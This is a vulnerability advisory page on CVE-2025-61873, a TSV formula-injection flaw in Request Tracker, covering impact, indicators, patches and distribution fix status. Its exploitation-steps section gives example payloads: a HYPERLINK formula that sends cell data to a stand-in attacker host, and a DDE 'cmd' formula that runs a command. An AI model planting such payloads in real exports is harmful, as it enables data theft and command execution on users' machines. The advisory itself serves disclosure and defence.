CVE-2025-61873
Linux Debian vulnerability analysis and mitigation

Overview

CVE-2025-61873 is a CSV Injection vulnerability in Best Practical Request Tracker (RT) that allows malicious ticket values to inject formula elements when TSV export is used. It affects RT versions before 4.4.9, 5.0.9, and 6.0.2. The CVE was published on January 16, 2026, and is classified under CWE-1236 (Improper Neutralization of Formula Elements in a CSV File). It carries a CVSS v3.1 base score of 2.6 (Low), assigned by MITRE (NVD).

Technical details

The vulnerability stems from insufficient sanitization of ticket field values before they are included in TSV (Tab-Separated Values) export output, classified as CWE-1236. An attacker with high privileges can craft ticket values containing formula injection payloads (e.g., strings beginning with =, +, -, or @) that are written verbatim into the exported file. When a user with sufficient privileges exports tickets and opens the resulting file in a spreadsheet application such as Microsoft Excel or LibreOffice Calc, the injected formulas may execute in the context of that application. Exploitation requires high attacker privileges, high attack complexity, and user interaction (opening the exported file), limiting the practical attack surface (NVD).

Impact

Successful exploitation results in a limited integrity impact within the scope of the spreadsheet application that opens the exported TSV file; there is no confidentiality or availability impact. The changed scope indicator reflects that the impact extends beyond the RT application itself to the client-side spreadsheet environment. In practice, an attacker could use injected formulas to perform actions such as exfiltrating data visible in the spreadsheet, executing local commands (in older or misconfigured spreadsheet applications), or deceiving users through manipulated displayed values (NVD).

Exploitability

There is no known public proof-of-concept exploit code or evidence of in-the-wild exploitation for CVE-2025-61873. The EPSS score is approximately 0.03%, indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires an attacker to already hold high privileges within the RT instance, significantly limiting the realistic threat (NVD).

Exploitation steps

  1. Gain privileged access: Obtain a high-privilege account within the target Best Practical RT instance (e.g., through credential theft or social engineering).
  2. Create or modify a ticket: Submit or edit a ticket, inserting a CSV injection payload into a ticket field (e.g., subject, custom field) such as =HYPERLINK("http://attacker.com/"&A1,"Click") or =cmd|' /C calc'!A0.
  3. Trigger TSV export: Navigate to the RT search or ticket list interface and initiate a TSV export that includes the malicious ticket.
  4. Deliver the file: Arrange (or wait) for a target user — such as an administrator or analyst — to download and open the exported TSV file in a spreadsheet application.
  5. Formula execution: When the victim opens the file in a vulnerable spreadsheet application, the injected formula executes, potentially exfiltrating data, displaying misleading content, or (in older applications) executing local commands (NVD).

Indicators of compromise

  • Logs: RT audit logs showing ticket creation or modification by a privileged user with unusual characters (=, +, -, @) at the start of field values; TSV export actions logged shortly after such modifications.
  • File System: Downloaded TSV export files containing field values beginning with formula-triggering characters (=, +, -, @) in ticket data fields.
  • Network: Outbound HTTP/DNS requests from a workstation to an unexpected external host shortly after a user opens an RT TSV export (indicative of formula-based data exfiltration via HYPERLINK or similar functions).

Mitigation and workarounds

Best Practical has released patched versions addressing this vulnerability: RT 4.4.9, 5.0.9, and 6.0.2. Administrators should upgrade to one of these versions as the primary remediation (NVD, RT Release Notes). As a workaround prior to patching, users should avoid opening RT TSV exports directly in spreadsheet applications, or use a text editor to inspect exported files before opening them. Debian users should apply the distribution-provided security updates (e.g., DSA-6032-1 or DLA-4349-1) as applicable.

Community reactions

Tenable published Nessus detection plugins (e.g., plugin 271215, 271494, 271581) for this vulnerability shortly after disclosure, enabling automated scanning. Debian issued security advisories (DSA-6032-1 and DLA-4349-1) addressing the vulnerability in their packaged versions of Request Tracker. Coverage has been limited to routine vulnerability tracking outlets, with no notable researcher commentary or significant social media discussion, consistent with the low severity and high exploitation prerequisites of this issue.

Additional resources

Linux Distribution fix status

Fix availability across major Linux distributions and their releases.

Debian

Fixed

bookworm

request-tracker5: 5.0.3+dfsg-3~deb12u4

Fixed

sid

request-tracker5: 5.0.7+dfsg-5

Fixed

trixie

request-tracker5: 5.0.7+dfsg-4+deb13u1

Fixed

Ubuntu

Unknown

bionic (esm-apps)

request-tracker4

Unknown

devel

request-tracker4

Unknown

focal (esm-apps)

request-tracker4

Unknown

jammy

request-tracker4

Unknown

jammy (esm-apps)

request-tracker4

Unknown

noble

request-tracker4

Unknown

noble (esm-apps)

request-tracker4

Unknown

questing

request-tracker5

Not Affected

SourceThis report was generated using AI

Related Linux Debian vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-44950CRITICAL9.5
  • Rocky Linux logoRocky Linux
  • libXfont-debuginfo
NoYesSep 10, 2026
CVE-2026-59679CRITICAL9.2
  • Rocky Linux logoRocky Linux
  • libXfont2-doc
NoYesSep 10, 2026
CVE-2026-88924HIGH7
  • Linux Debian logoLinux Debian
  • gvfs-afp
NoNoSep 10, 2026
CVE-2026-87933MEDIUM5.5
  • Linux Debian logoLinux Debian
  • cjson
NoNoSep 10, 2026
CVE-2026-61915MEDIUM4.2
  • Linux Debian logoLinux Debian
  • cyrus-imapd-doc-extra
NoNoSep 09, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management